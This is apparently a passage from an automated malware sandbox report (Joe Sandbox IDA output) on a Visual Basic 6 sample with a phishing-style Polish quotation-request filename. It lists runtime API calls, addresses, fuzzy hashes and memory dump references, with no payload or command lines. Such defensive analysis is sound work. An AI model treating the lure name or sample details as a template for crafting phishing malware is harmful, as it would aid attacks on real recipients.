                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E418170E00219DFDB14EF94DD81AAEF7B9EF58700F50811AE501B7660D6B4A8428BE9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000080,00000004), ref: 0042A30A
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0,?,?), ref: 0042A334
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188,?,?,?,?), ref: 0042A35B
                                                                                                                                                                                                                                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?), ref: 0042A36D
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?), ref: 0042A37D
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 0042A39C
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042A3B1
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0042A3C7
                                                                                                                                                                                                                                                      • __vbaI4Var.MSVBVM60(?,00000000,?,?,?,00000000), ref: 0042A3E6
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042A3F6
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 0042A400
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0042A409
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0042A412
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$CheckFreeHresult$CallLateLockRedimSystemUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 204333147-0
                                                                                                                                                                                                                                                      • Opcode ID: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
                                                                                                                                                                                                                                                      • Instruction ID: 897c9a6cfbc361b2304c829fc1f6f3fe0cbd2f804f2c9409275e98d7ea74f451
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E031A234600215EBDB04DBA0DD89EAEB779FF44704F208529F902BB2A1D774AC46CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A175
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A1B2
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A207
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A230
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A246
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A26C
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041A28F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$System$Chkstk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1207130036-0
                                                                                                                                                                                                                                                      • Opcode ID: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
                                                                                                                                                                                                                                                      • Instruction ID: 8b7a934a7eebc36cfe3af54c4ed22efe6341180558cb6e4886e9f12f2822d10f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B51FA74901208EBDB10DFE4DA48BDEBBB5FF48308F208569E501B7390D7799A44DBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0040F418,0042C0BC,?), ref: 0041E74E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0041E77E
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0041E795
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7A1
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E7AF
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0041E7B8
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7D3
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7E4
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7F5
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E803
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,Function_000032B6), ref: 0041E811
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,Function_000032B6), ref: 0041E827
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3861917509-0
                                                                                                                                                                                                                                                      • Opcode ID: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
                                                                                                                                                                                                                                                      • Instruction ID: a92ad539ecbf6efebda2d3259df1282ada01a5d6d20107e5edffdf3838fad138
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61310CB5900208EFCB00DFE4DA88FDEBBB8EB48314F108259F501B7290C7789A44CBA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(0040CEB3,004032B6,0040CEB3,?,?,?,00000000,004032B6), ref: 0041584E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040CEB3,004032B6,0040CEB3), ref: 0041587E
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 0041589D
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004158AA
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 004158C9
                                                                                                                                                                                                                                                      • #570.MSVBVM60(?), ref: 004158DB
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 004158E2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004158ED
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,?), ref: 00415905
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(?), ref: 00415917
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041592A
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041595E), ref: 00415957
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 947554498-0
                                                                                                                                                                                                                                                      • Opcode ID: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
                                                                                                                                                                                                                                                      • Instruction ID: 9d0290c9668b0b97bc5e056eca09828b1551f52cd0b7d0ae963dc3f7ea44dd8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0314BB5C00248EBDB00DFD4DA48BDEBBB8FF08714F208159E611B72A0DB795A48CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040FF4E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040FF95
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0040FFC6
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,0000004C), ref: 0040FFF9
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 00410038
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410081
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,00000040), ref: 004100B9
                                                                                                                                                                                                                                                      • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 004100DC
                                                                                                                                                                                                                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004100EF
                                                                                                                                                                                                                                                      • __vbaCastObj.MSVBVM60(00000000,004077C4), ref: 00410112
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041011D
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 00410150
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041016B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                                                                                                                                                                                      • String ID: [
                                                                                                                                                                                                                                                      • API String ID: 269068952-784033777
                                                                                                                                                                                                                                                      • Opcode ID: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
                                                                                                                                                                                                                                                      • Instruction ID: 16c54425a3ce120e5e2135e3149755cc9251ea993a7cd341aaf2995901e8571e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61512A75900608EBDB10DFA4D948BDEBBB4FF08704F20825DF515AB291D7799A84CFA8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00419688
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004196A2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 004196C9
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(00000000), ref: 004196D3
                                                                                                                                                                                                                                                      • __vbaStrComp.MSVBVM60(00000001,00000000,?), ref: 004196E5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004196FA
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00419745
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 0041975F
                                                                                                                                                                                                                                                      • __vbaCopyBytes.MSVBVM60(00000010,00000000,?), ref: 0041977E
                                                                                                                                                                                                                                                      • __vbaErase.MSVBVM60(00000000,?), ref: 004197AC
                                                                                                                                                                                                                                                      • __vbaErase.MSVBVM60(00000000,?), ref: 004197BF
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041981A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$DestructErase$BytesCompCopyFreeLockMoveOverflowUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2458773320-0
                                                                                                                                                                                                                                                      • Opcode ID: 385b518716c5d96581d354086ed4219ffaaac5b28a4e957e8dddbad5aed777d6
                                                                                                                                                                                                                                                      • Instruction ID: b4eaaf3b6912c0b715553f9d0a6d665ec823eac17e865164621a45f09c466846
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 385b518716c5d96581d354086ed4219ffaaac5b28a4e957e8dddbad5aed777d6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8510874A10109EFDB08DF94DAA8BEDB7B5FF44301F208199E516AB290CB74AD81CF55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$AnsiUnicode$ErrorFreeListSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3859701107-0
                                                                                                                                                                                                                                                      • Opcode ID: 5c61e922defa331cc4ce072f563674e95d7f8f498ef2ac34effc3ba57cb8711b
                                                                                                                                                                                                                                                      • Instruction ID: 594d62947b0162dfde37296f4cb3f61c41ad37821fc0585372e9270dc8f55869
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c61e922defa331cc4ce072f563674e95d7f8f498ef2ac34effc3ba57cb8711b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D031B6B5D10219AFCB04DFA4CD85DEFBBBCEB8C700F10455AE901A7250D674A9058FB4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DABE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DB05
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB1E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB29
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB4A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB63
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB6E
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB8F
                                                                                                                                                                                                                                                        • Part of subcall function 00415FD0: __vbaSetSystemError.MSVBVM60(00000000,0040DBA1,?,?,?,?,Function_000032B6), ref: 00415FE5
                                                                                                                                                                                                                                                        • Part of subcall function 00416100: __vbaSetSystemError.MSVBVM60(00000000,0040DBAD,?,?,?,?,Function_000032B6), ref: 00416115
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$Free$System$AnsiCopyUnicode$ChkstkMove$BstrList
                                                                                                                                                                                                                                                      • String ID: RU
                                                                                                                                                                                                                                                      • API String ID: 279242310-1417676127
                                                                                                                                                                                                                                                      • Opcode ID: 834666a230e91adafad132ac9b958fc5a9d9edbf53aecaab06e1bd8c04ae2b97
                                                                                                                                                                                                                                                      • Instruction ID: a5e5539ec0bd47771e5bba15ffd7383eda2de6e9d9ac7ceec32cc9b4ad75a0a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 834666a230e91adafad132ac9b958fc5a9d9edbf53aecaab06e1bd8c04ae2b97
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7312A71600244EFDB00DF94DE4AF9E7BB8FB48704F60816DF505A72A0CB786A44CBA9
                                                                                                                                                                                                                                                      APIs
